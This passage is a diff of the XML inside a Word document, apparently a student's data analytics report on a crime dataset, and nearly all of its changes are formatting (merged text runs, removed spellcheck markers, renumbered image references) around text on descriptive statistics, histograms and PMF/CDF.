+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="pt-BR" w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00735976" wp14:editId="2E7EDF18">
+            <wp:extent cx="3211539" cy="2244213"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="3810"/>
+            <wp:docPr id="1929166547" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1929166547" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId16"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3222353" cy="2251770"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
     </w:p>
     <w:p>
@@ -8416,23 +8180,41 @@
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
+          <w:lang w:val="pt-BR" w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="3" w:name="_Toc59959350"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
           <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="pt-BR" w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -8486,15 +8268,7 @@
         <w:pStyle w:val="NormalWeb"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">We can use a set of tools and techniques for collecting, organizing, summarizing, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>analyzing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>, and interpreting data.</w:t>
+        <w:t>We can use a set of tools and techniques for collecting, organizing, summarizing, analyzing, and interpreting data.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -8533,9 +8307,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Statistical techniques were employed in this project within the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Statistical techniques were employed in this project within the Jupyter notebook named </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8550,9 +8323,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>Jupyter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>“</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8567,7 +8339,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> notebook named </w:t>
+        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8583,7 +8355,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>“</w:t>
+        <w:t>”,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8599,7 +8371,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>MSC_DA_CA1_Jose_Mario.ipynb</w:t>
+        <w:t xml:space="preserve"> encompassing both </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8615,7 +8387,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>”,</w:t>
+        <w:t>“</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8631,7 +8403,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> encompassing both </w:t>
+        <w:t>Phase 3, which focused on statistics, and Phase 4, which centered on machine learning</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8647,7 +8419,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>“</w:t>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8663,9 +8435,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Phase 3, which focused on statistics, and Phase 4, which </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8680,10 +8451,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>centered</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -8697,8 +8472,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> on machine learning</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8713,7 +8487,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>”</w:t>
+        <w:t>By u</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8729,7 +8503,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>.</w:t>
+        <w:t>sing the method describe, we can get important information from the result</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8745,74 +8519,6 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>By u</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t>sing the method describe, we can get important information from the result</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
         <w:t>.</w:t>
       </w:r>
     </w:p>
@@ -8955,47 +8661,11 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
         </w:rPr>
-        <w:t>Applyiing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>the .describe</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">() method on </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Applyiing the .describe() method on crime_df:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9012,6 +8682,7 @@
           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
           <w:noProof/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
@@ -9077,7 +8748,6 @@
                               </w:rPr>
                               <w:t xml:space="preserve">From this </w:t>
                             </w:r>
-                            <w:proofErr w:type="gramStart"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9094,7 +8764,6 @@
                               </w:rPr>
                               <w:t>describe</w:t>
                             </w:r>
-                            <w:proofErr w:type="gramEnd"/>
                             <w:r>
                               <w:rPr>
                                 <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9235,7 +8904,6 @@
                         </w:rPr>
                         <w:t xml:space="preserve">From this </w:t>
                       </w:r>
-                      <w:proofErr w:type="gramStart"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9252,7 +8920,6 @@
                         </w:rPr>
                         <w:t>describe</w:t>
                       </w:r>
-                      <w:proofErr w:type="gramEnd"/>
                       <w:r>
                         <w:rPr>
                           <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
@@ -9380,7 +9047,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16"/>
+                    <a:blip r:embed="rId17"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9446,7 +9113,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Histograms provide a visual representation of the distribution of </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9477,24 +9143,7 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>,</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9584,7 +9233,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17"/>
+                    <a:blip r:embed="rId18"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -9642,14 +9291,38 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t xml:space="preserve">Figure 05 – histogram of </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
+        <w:t>Figure 05 – histogram of crime_df</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>Insights:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
@@ -9661,37 +9334,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>crime_df</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>Insights:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9705,8 +9349,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>There are some insights that you can get from the bin plot:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9720,14 +9370,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>There are some insights that you can get from the bin plot:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9741,8 +9385,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9756,14 +9406,8 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The distribution of the VALUE column is skewed to the right. This means that there are more values on the right side of the distribution than on the left side.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9777,8 +9421,14 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:spacing w:line="288" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="auto"/>
@@ -9792,27 +9442,6 @@
             <w14:bevel/>
           </w14:textOutline>
         </w:rPr>
-        <w:t>The median value of the VALUE column is between 10,000 and 15,000.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="auto"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto"/>
-          <w:lang w:val="en-IE" w:eastAsia="en-IE"/>
-          <w14:textOutline w14:w="0" w14:cap="rnd" w14:cmpd="sng" w14:algn="ctr">
-            <w14:noFill/>
-            <w14:prstDash w14:val="solid"/>
-            <w14:bevel/>
-          </w14:textOutline>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -9857,21 +9486,8 @@
         <w:pStyle w:val="NormalWeb"/>
         <w:jc w:val="both"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Pmf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Cdf</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
+      <w:r>
+        <w:t>Pmf and Cdf are classes that represent probability mass functions (PMFs) and cumulative distribution functions (CDFs), respectively.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9906,15 +9522,8 @@
         <w:jc w:val="both"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Before getting the PMF and CDF information, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>its</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> important to prepare the dataset.</w:t>
+        <w:lastRenderedPageBreak/>
+        <w:t>Before getting the PMF and CDF information, its important to prepare the dataset.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -9947,7 +9556,6 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7109AA25" wp14:editId="30836D73">
             <wp:extent cx="3748088" cy="1673378"/>
@@ -9964,7 +9572,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId18"/>
+                    <a:blip r:embed="rId19"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -10064,17 +9672,13 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:noProof/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2365DA41" wp14:editId="480F6905">
-            <wp:extent cx="5576047" cy="2523490"/>
-            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
-            <wp:docPr id="86401753" name="Picture 1" descr="A graph of a number of blue bars&#10;&#10;Description automatically generated with medium confidence"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A7C7D05" wp14:editId="4F10DDD2">
+            <wp:extent cx="5375564" cy="1924784"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1352862727" name="Picture 1" descr="A graph with blue and black text&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10082,13 +9686,648 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="86401753" name="Picture 1" descr="A graph of a number of blue bars&#10;&#10;Description automatically generated with medium confidence"/>
+                    <pic:cNvPr id="1352862727" name="Picture 1" descr="A graph with blue and black text&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5394993" cy="1931741"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figure 06 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="en-IE"/>
+        </w:rPr>
+        <w:t>–</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
